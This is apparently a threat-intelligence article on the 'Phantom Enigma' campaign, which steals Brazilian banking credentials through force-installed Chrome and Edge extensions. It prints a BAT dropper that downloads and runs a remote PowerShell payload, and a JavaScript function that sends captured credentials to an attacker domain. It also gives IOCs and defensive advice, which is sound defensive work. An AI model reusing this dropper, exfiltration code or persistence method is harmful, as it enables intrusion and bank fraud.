Malware Campaign Installs Malicious Browser Extensions on Chrome & Edge to Exfiltrate Sensitive Data

A sophisticated malware campaign, tracked as “Phantom Enigma,” has been discovered exploiting browser extension mechanisms in Google Chrome, Microsoft Edge, and Brave.

The objective is clear: stealthily exfiltrate sensitive authentication data, particularly targeting bank customers in Brazil.

Threat intelligence teams from Positive Technologies Security Expert Center exposed this campaign’s full attack chain, revealing both technical depth and adaptation.

Initial Access and Delivery Mechanisms

The campaign begins with targeted phishing emails masquerading as invoices, enticing recipients to download malicious files. These emails contain either direct download links or weaponized attachments with the following key variants:

• BAT scripts: Batch files orchestrating the initial infection.
• MSI (Windows Installer) and Inno Setup Installers: Installers signed to appear legitimate but configured for malicious post-install actions.

For example, a typical BAT script escalates privileges and downloads a PowerShell payload:

text@echo off
net session >nul 2>&1
if %errorLevel% neq 0 (
    powershell -Command "Start-Process '%~f0' -Verb RunAs"
    exit
)
powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFile '%TEMP%\cliente.ps1'"
powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\cliente.ps1"

The downloaded PowerShell script includes virtual machine evasion routines, persistence mechanisms via Windows Registry, and disables User Account Control (UAC). Critically, it connects to a command-and-control server (142.54.185.178) to await further instructions.

Browser Extension Installation

The malicious extension is force-installed by manipulating Windows Registry or browser policy files (e.g., HKLM\Software\Policies\Google\Chrome\ExtensionInstallForcelist). Attackers either use official Chrome Web Store IDs or install the extension directly from disk:

• Persistence: The malware modifies .lnk shortcuts for Chrome/Edge, adding the --load-extension=<path> parameter to ensure the malicious code loads whenever the browser starts.
• Alternative Payloads: If the extension path is not viable, attackers can deploy a Mesh Agent-based RAT (Remote Access Tool) for broader system compromise.

Malicious Extension Functionality

The extension comprises several obfuscated JavaScript files, primarily run-back.js and cs.js. Once active, the extension monitors banking web portals (specifically Banco do Brasil), intercepting login tokens, account passwords, and authentication headers.

A key function sends stolen credentials to the attacker’s server:

javascriptfunction r(requestBody, requestMethod) {
  chrome.storage.sync.get("eindeutigeKennung", function (keyData) {
    let uniqueID = keyData.eindeutigeKennung;
    let url = "https://financial-executive.com/comando_temporario.php?eindeutigeKennung=" + uniqueID + "&k=" + requestBody.identificacaoUsuario;
    fetch(url, {
      method: requestMethod,
      headers: {'Content-Type': "application/json"},
      body: JSON.stringify(requestBody)
    });
  });
}

The extension listens for specific banking page activity. If a user attempts login or inputs a password, these details are captured and exfiltrated in real-time.

The extension also periodically polls the attacker’s server for new instructions, enabling dynamic attack capabilities such as displaying fake QR codes or phishing prompts on the banking site.

System and Network Impact

• Target Scope: Over 70 organizations compromised, with more than 700 confirmed malicious extension downloads (some by security sandboxes).
• Geographic Focus: Specifically engineered to detect and require “Warsaw Technology,” a security solution used by Brazilian banks.
• Infrastructure: Utilizes multiple attacker-controlled domains (e.g., clientepj.com, financial-executive.com, computadorpj.com) and IPs for payload delivery and command-and-control.

Technical Indicators and Defensive Insights

Indicators of Compromise (IOCs)

Network:

• Attacker domains: financial-executive.com, clientepj.com, computadorpj.com
• C2 IPs: 142.54.185.178, 107.174.231.26

Extension IDs:

• nplfchpahihleeejpjmodggckakhglee
• ckkjdiimhlanonhceggkfjlmjnenpmfm

File Hashes: (Sample SHA-256)

• bae3cce0cbe6a0227ed33fe566f0e8fe4780f2a57743acc98f6859740d2d254d
• a3d85fad74a24a9fc45b91c82f178a6bf5eb041804ecfb4f2c529622772e8b8f

Persistence and Evasion

• Registry edits for autostart.
• Modifies browser shortcuts for extension persistence.
• Checks for virtual machines and disables on detection.
• Disables UAC to impede user prompts and AV products.

MITRE ATT&CK Techniques:

• T1547 (Persistence via Registry Run Keys)
• T1176 (Browser Extensions)
• T1059.001 (PowerShell)
• T1204.002 (Malicious File Execution)

The Phantom Enigma campaign showcases advanced multi-vector attack strategies, leveraging browser extension mechanisms for stealthy credential theft. Its technical sophistication—ranging from VM evasion, registry and shortcut manipulation, to real-time command-and-control—demands vigilant endpoint monitoring and proactive browser security policies, particularly for organizations and users in targeted regions like Brazil.

Defensive Recommendation:

• Regularly audit extension policies and browser shortcut parameters.
• Block listed domains and extension IDs at the network and endpoint level.
• Educate users about phishing threats and initiate rapid incident response on detection of related IOCs.

Cybersecurity defenders should remain on high alert for evolving browser-based malware campaigns as attacker sophistication only intensifies.